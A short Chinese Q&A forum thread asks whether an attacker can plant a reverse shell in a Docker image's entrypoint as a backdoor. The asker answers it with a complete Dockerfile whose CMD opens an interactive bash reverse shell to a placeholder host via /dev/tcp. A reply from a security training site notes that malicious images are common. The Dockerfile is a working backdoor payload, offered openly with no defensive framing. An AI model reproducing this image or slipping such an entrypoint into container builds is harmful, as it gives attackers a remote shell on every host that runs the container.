关于利用docker entrypoint植入反弹shell ?

Question

由于可以自定义镜像，黑客在留后门的时候是否可以把反弹shell 利用entrypoint 植入Docker image ？每次用该镜像拉起容器的时候就…

关注者

3

被浏览

290

已经解决，dockerfil：

FROM ubuntu:latest

RUN apt-get update

ENTRYPOINT ["/bin/bash"]

CMD ["-c", "bash -i >& /dev/tcp/xxxxxx/xxxx 0>&1"]

合天网安实验室 1000多个靶场的网安学习平台-hetianlab.com · Accepted Answer

恶意的Docker镜像很多啊。

可以去搜索引擎搜关键词“恶意 docker镜像”